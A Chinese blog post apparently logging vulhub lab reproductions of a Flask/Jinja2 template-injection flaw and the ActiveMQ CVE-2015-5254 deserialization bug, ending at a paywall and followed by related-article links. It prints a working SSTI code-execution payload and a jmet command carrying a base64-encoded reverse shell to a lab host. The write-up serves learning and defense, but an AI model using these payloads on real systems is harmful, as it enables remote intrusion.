vulhub复现记录

最新推荐文章于 2024-12-17 00:10:07 发布
最新推荐文章于 2024-12-17 00:10:07 发布
阅读量2k 收藏 58
点赞数 18
CC 4.0 BY-SA版权
分类专栏: CTF 文章标签: 网络 安全 oscp 黑客 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64696290/article/details/136430025

image.png

环境搭建

原项目地址:
vulhub/vulhub:基于 Docker-Compose 的预构建易受攻击环境 (github.com)

在 Ubuntu 22.04 上安装 Docker:

# Install the latest version docker
curl -s https://get.docker.com/ | sh

# Run docker service
systemctl start docker

看作者下面的解释可以知道,自 2022 年 2 月起,作为 Docker Compose V2023 的子命令合并到 Docker 中,Python 版本的 docker-compose 将在 <> 年 <> 月之后弃用。

但是由于我之前在CentOS搭建了老的docker,所以就继续使用,老的docker-compose.其中遇到不少坑,就浅浅的记录一下吧。

你终于回来了(。・∀・)ノ (cnblogs.com)

查看版本的时候报错解决:

报错:CryptographyDeprecationWarning: Python 3.6 is no longer supported by the Python core team._流音寻帆_jonesky的博客-CSDN博客

Flask(Jinja2) 服务端模板注入漏洞

1. SSTI(模板注入)漏洞(入门篇) - bmjoker - 博客园 (cnblogs.com)

先看了上面的特别棒的一篇文章才知道SSTI模板注入漏洞是什么。接下来才好有意义能理解的复现。

正常的手段真是啥也看不出来,所以目的是重在知道有这个框架和漏洞

刚一进来,啥也没有

image.png

直到输入参数,发现有一个可以改变的模板,我们的{ {2*2}}竟然被计算了。

image.png

根据上面那篇详细的SSTI教程可以知道payload构造如下,

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {
  
  { b['eval']('__import__("os").popen("id").read()') }}         //popen的参数就是要执行的命令
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

成功执行:

image.png

甚至安利了一款工具:

这里推荐自动化工具tplmap,拿shell、执行命令、bind_shell、反弹shell、上传下载文件,Tplmap为SSTI的利用提供了很大的便利

github地址:https://github.com/epinna/tplmap

下面我们再去docker看看web源码:

from flask import Flask, request
from jinja2 import Template

app = Flask(__name__)

@app.route("/")
def index():
    name = request.args.get('name', 'guest')

    t = Template("Hello " + name)
    return t.render()

if __name__ == "__main__":
    app.run()

修复方式,可以把

t = Template("Hello " + name)

return t.render()

改成:

t = Template("Hello { {n}}")

return t.render(n=name)

ActiveMQ

CVE-2015-5254 反序列化漏洞

Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。

Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

参考链接:

漏洞环境

运行漏洞环境:

docker compose up -d

环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。访问http://your-ip:8161即可看到web管理页面,不过这个漏洞理论上是不需要web的。

漏洞复现

漏洞利用过程如下:

  1. 构造(可以使用ysoserial)可执行命令的序列化对象
  2. 作为一个消息,发送给目标61616端口
  3. 访问web管理页面,读取消息,触发漏洞

使用jmet进行漏洞利用。首先下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。

jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。

执行:

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.150.130 61616

image.png

此时会给目标ActiveMQ添加一个名为event的队列,我们可以通过http://your-ip:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息:

image.png

点击查看这条消息即可触发命令执行,此时进入容器sudo docker-compose exec activemq bash,可见/tmp/success已成功创建,说明漏洞利用成功:

image.png

将命令替换成弹shell语句再利用:

首先我们这里构造的payload是需要编码的,用的是base64

image.png

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1MC4xMjgvMTkxMTEgMD4mMQ==}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.150.130 61616

最低0.47元/天 解锁文章

200万优质内容无限畅学
vulhub漏洞复现
qq_30854761的博客
04-26 4320
下载镜像 1 docker pull medicean/vulapps:s_shiro_1 直接运行镜像,将docker的8080端口映射到本地的 8080上 1 docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1 获取复现需要用到的ysoserial工具 若无mvn则自行下载安装 1 2 3 git clone..
vulhub复现CVE-2021-44228log4j漏洞
weixin_48878440的博客
12-12 1226
vulhub复现cve-2021-44228 log4j漏洞
vulhub-漏洞复现(Spring Data Rest 远程命令执行漏洞(CVE-2017-8046))
weixin_45095113的博客
12-08 605
vulhub漏洞复现
Vulhub复现---DNS域传送 (dns-zone-transfer)
qq_63101755的博客
07-20 598
Vulhub复现---DNS域传送 (dns-zone-transfer)
Vulhub漏洞复现
weixin_45995579的博客
09-30 1912
蔚莱. 1.环境搭建 下载vulhub压缩包,解压到Ubuntu16.04系统下。 进入到Tomcat put 漏洞对应的CVE漏洞编号/vulhub-master/httpd/ssi-rce路径下,执行如下两条命令: docker-compose build docker-compose up -d 网站的配置文件在当前路径下的docker-compose.yml文件内: 【注】:CVE漏洞环境默认开启的端口是8080,当要同时开启多个CVE漏洞环境时需要
Kali 搭建Vulhub靶场 (详细)
qq_43508668的博客
04-21 1750
这里写目录标题安装Docker安装pip安装docker-compose下载Vulhub 安装Docker 检查软件更新 apt-get update 安装https协议、CA证书 apt-get install -y apt-transport-https ca-certificates 安装docker apt install docker.io docker -v 查看是否安装成功 启动docker systemctl start docker 显示docker信息 docker ps -
vulhub中漏洞复现1
xhscxj的博客
05-23 2109
CVE-2018-18778 CVE-2018-18778是基于mini_httpd的一个任意文件读取漏洞 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 影响版本:ACME mini_httpd before 1.30 分析 当mini_httpd开启虚拟主机时,此
vulhub-Struts2-045(CVE-2017-5638)漏洞复现
m0_62008601的博客
07-31 2230
struts2重要漏洞之一
Vulhub复现fastison漏洞
weixin_64655821的博客
11-08 1672
Vulhub复现fastison漏洞
vulhub复现
最新发布
07-28
VulHub复现漏洞通常需要按照以下步骤进行操作,以确保能够正确地搭建漏洞环境并完成复现过程: ### 搭建环境 1. **安装 Docker**:确保已经安装了 Docker 和 Docker Compose。可以通过以下命令检查是否已...
如何通过vulhub靶场复现log4j2漏洞
weixin_46683781的博客
06-11 2574
准备: 攻击机:kaili 靶机:Mac的vulhub靶场Log4j2默认支持解析ldap/rmi协议,并会通过名称从ldap服务端其获取对应的Class文件,并使用ClassLoader在本地加载Ldap服务端返回的Class类。这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:{sys:java.version}}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意
vulhub】Weblogic(CVE-2018-2628)漏洞复现
qq_45300786的博客
04-10 3097
一、什么是WebLogic WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 先提几个概念 JRMP:java remote method protocol,Java远程方法协议 JRMP是的Java技术协议的具
Vulhub:Redis[漏洞复现]
如有错误感谢斧正
12-17 1200
我们借助Lua沙箱中遗留的变量`package`的`loadlib`函数来加载动态链接库`/usr/lib/x86_64-linux-gnu/liblua5.1.so.0`里的导出函数`luaopen_io`。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象`package`,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。服务启动后,我们可以使用`redis-cli -h your-ip`连接这个redis服务器。
vulhub-spring漏洞复现
qq_51922767的博客
09-14 3095
vulhub-spring漏洞复现
Vulhub:Shiro[漏洞复现]
如有错误感谢斧正
12-07 1319
Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。在Apache Shiro 1.1.0以前的版本中,shiro 进行权限验证前未对url 做标准化处理,攻击者可以构造`/`、`//`、`/./`、`/../` 等绕过权限验证。在Apache Shiro 1.5.2以前的版本中,在使用Spring动态控制器时,攻击者通过构造`..;服务启动后,访问`http://your-ip:8080`可使用`admin:vulhub`进行登录。
【漏洞复现vulhub 中间件漏洞
qq_46421742的博客
08-09 652
tomcat是一个开源而且免费的jsp服务器,默认端口:8080,属于轻量级应用服务器。它可以实现 JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的一款环境。在历史上也披露出来了很多的漏洞,本文讲几个经典的漏洞复现过程。
vulhub漏洞复现-bash(CVE-2014-6271) shellshock-破壳漏洞
weixin_45095113的博客
12-21 517
vulhub漏洞复现-bash(CVE-2014-6271) shellshock-破壳漏洞复现
vulhub靶场漏洞复现
m0_60660067的博客
08-11 435
vulhub靶场,简单漏洞复现
复现vulhub nginx解析漏洞
BBH_FCC的博客
03-16 771
(1)切换目录:cd vulhub-master/nginx/nginx_parsing_vulnerability。(2)docker-compose up -d 启动。(3)访问:http:// 192.168.68.152。(4)上传一个图片,burpsuite抓包。(5)send to repeater,修改数据包,在末尾添加
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

是乙太呀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值